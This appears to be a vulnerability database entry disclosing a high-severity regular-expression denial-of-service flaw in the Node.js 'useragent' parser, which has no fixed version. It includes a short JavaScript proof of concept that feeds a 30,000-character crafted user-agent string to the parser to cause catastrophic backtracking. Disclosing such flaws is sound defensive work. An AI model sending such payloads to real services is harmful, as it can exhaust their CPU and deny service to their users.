VDB
Sign up
HIGH7.5

GHSA-mgfv-m47x-4wqp

useragent Regular Expression Denial of Service vulnerability

Details

Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).

## PoC ```js async function exploit() { const useragent = require(\"useragent\");

// Create a malicious user-agent that leads to excessive backtracking const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';

// Parse the malicious user-agent const agent = useragent.parse(maliciousUserAgent);

// Call the toString method to trigger the vulnerability const result = await agent.device.toString(); console.log(result); }

await exploit(); ```

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/useragent
Introduced in: 0

No fixed version published yet for useragent (npm). Pin to a known-safe version or switch to an alternative.

References